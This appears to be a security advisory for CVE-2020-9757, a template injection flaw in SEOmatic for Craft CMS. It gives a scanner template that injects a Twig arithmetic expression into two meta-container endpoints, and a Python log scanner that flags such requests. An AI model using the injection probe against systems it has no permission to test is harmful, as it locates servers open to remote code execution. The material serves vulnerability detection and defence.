CVE-2020-9757: SEOmatic < 3.3.0 Server-Side Template Injection

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

PoC code [public]

id: CVE-2020-9757

info:
  name: SEOmatic < 3.3.0 Server-Side Template Injection
  author: x1n9Qi8
  severity: high
  description: |-
    The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
  reference:
    - https://www.tenable.com/security/research/tra-2020-40
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9757
  tags: cve,cve2020,seomatic,ssti
  created: 2023/08/17

set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  poc10:
    request:
      method: GET
      path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
    expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
  poc20:
    request:
      method: GET
      path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
    expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
expression: poc10() || poc20()
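
Detection example (added here; not part of the template above or of the SEOmatic project): a log scan that flags requests to the two meta-container endpoints the template probes when their `uri` parameter carries Twig delimiters, including percent-encoded and double-encoded forms. It assumes combined-format access logs and the default `/actions/` path used in the template; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint prefix shared by both request paths in the template above.
SEOMATIC_PREFIX = "/actions/seomatic/meta-container/"
# Twig opening delimiters: output, statement, comment.
TWIG_DELIMS = ("{{", "{%", "{#")
# Request target inside a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def _decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(log_line):
    """True for a meta-container request whose `uri` holds Twig delimiters."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    target = urlsplit(m.group(1))
    if not target.path.lower().startswith(SEOMATIC_PREFIX):
        return False
    # parse_qs removes one layer of percent-encoding; _decode_fully the rest.
    params = parse_qs(target.query, keep_blank_values=True)
    return any(delim in _decode_fully(v)
               for v in params.get("uri", [])
               for delim in TWIG_DELIMS)


# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2025:10:00:01 +0000] "GET /actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B41000*%2742000%27%7D%7D HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Sep/2025:10:00:02 +0000] "GET /actions/seomatic/meta-container/all-meta-containers?uri=%257B%257B41000*1%257D%257D HTTP/1.1" 200 640',
    '198.51.100.4 - - [01/Sep/2025:10:00:03 +0000] "GET /actions/seomatic/meta-container/all-meta-containers?uri=/blog/post-1 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Sep/2025:10:00:04 +0000] "GET /search?uri=%7B%7Bx%7D%7D HTTP/1.1" 200 100',
]


def scan(lines):
    """Return the log lines flagged by is_suspicious, in input order."""
    return [line for line in lines if is_suspicious(line)]
```

A flagged line that was answered with status 200 deserves a closer look, since the template treats a 200 response containing the evaluated product as confirmation.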